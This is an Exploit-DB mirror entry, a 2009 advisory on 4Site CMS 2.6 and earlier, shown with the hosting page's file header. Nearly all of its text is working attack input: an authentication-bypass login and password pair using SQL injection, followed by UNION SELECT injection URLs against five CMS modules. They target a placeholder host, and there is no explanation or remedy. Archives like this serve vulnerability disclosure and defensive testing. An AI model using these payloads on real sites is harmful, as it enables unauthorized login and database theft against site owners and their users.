exploit-db-mirror/platforms/php/webapps/7964.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

33 lines
752 B
Text
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

[WSEC-09-002] 4Site CMS <= 2.6 Multiple Remote SQL Injections
Developer site: http://www.4site.ru/
Discovered by D.Mortalov // wsec.ru
1. Auth Bypass
Login: 1'or'1
Password: 1'or1
2. Multiple Remote SQL Injections in 4site CMS modules
"Pages" module:
http://vulnerable.site/print/print.shtml?page=-1+union+select+1
"Portfolio" module:
http://vulnerable.site/portfolio/index.shtml?s=1&i=-1+union+select+1,2,3,4,5,6,7,8,9
http://vulnerable.site/portfolio/index.shtml?s=-1+union+select+1
"Hotels" module:
http://vulnerable.site/hotel/?h=-1+union+select+1
"News" module:
http://vulnerable.site/news/news1.shtml?id=-1+union+select+1,2,3,4
"FAQ" module:
http://vulnerable.site/faq/index.shtml?th=-1+union+select+1
# milw0rm.com [2009-02-03]